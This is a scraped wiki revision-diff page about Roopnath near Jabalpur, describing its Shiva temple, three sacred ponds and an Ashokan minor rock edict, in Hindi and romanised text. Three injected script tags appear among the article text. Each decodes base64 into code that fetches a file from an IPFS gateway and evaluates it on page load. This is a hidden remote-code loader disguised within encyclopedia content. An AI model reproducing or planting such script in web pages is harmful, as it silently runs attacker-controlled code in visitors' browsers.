Difference between revisions of "रूपनाथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *मध्यप्रदेश के जबलपुर की कैमूर पर्वत ...' के साथ नया पन्ना बनाया)
 
Line 3: Line 3:
 
*रूपनाथ में  [[शिव]] का प्राचीन मन्दिर  स्थित है।  
 
*रूपनाथ में  [[शिव]] का प्राचीन मन्दिर  स्थित है।  
 
*यह एक तीर्थ स्थल है, जहाँ [[राम]], [[लक्ष्मण]] तथा [[सीता]] के नाम पर तीन सरोवर बने हुए हैं।  
 
*यह एक तीर्थ स्थल है, जहाँ [[राम]], [[लक्ष्मण]] तथा [[सीता]] के नाम पर तीन सरोवर बने हुए हैं।  
*मौर्य शासक [[अशोक के शिलालेख|अशोक का लघु शिलालेख]] सं. 1 यहाँ एक चट्टान पर उत्कीर्ण है।  
+
*मौर्य शासक [[अशोक के शिलालेख|अशोक का लघु शिलालेख]] सं.1 यहाँ एक चट्टान पर उत्कीर्ण है।  
 
*लेख में [[अशोक]] यह दावा करता है कि उसके धम्म प्रचार के फलस्वरूप [[भारत]] के निवासी अपने नैतिक आचरण के कारण [[देवता|देवताओं]] से मिल गये हैं।  
 
*लेख में [[अशोक]] यह दावा करता है कि उसके धम्म प्रचार के फलस्वरूप [[भारत]] के निवासी अपने नैतिक आचरण के कारण [[देवता|देवताओं]] से मिल गये हैं।  
  

Revision as of 12:06, 19 May 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • madhyapradesh ke jabalapur ki kaimoor parvat shrriankhala ki talahati mean sthit yah ek ramanik sthal hai.
  • roopanath mean shiv ka prachin mandir sthit hai.
  • yah ek tirth sthal hai, jahaan ram, lakshman tatha sita ke nam par tin sarovar bane hue haian.
  • maury shasak ashok ka laghu shilalekh san.1 yahaan ek chattan par utkirn hai.
  • lekh mean ashok yah dava karata hai ki usake dhamm prachar ke phalasvaroop bharat ke nivasi apane naitik acharan ke karan devataoan se mil gaye haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh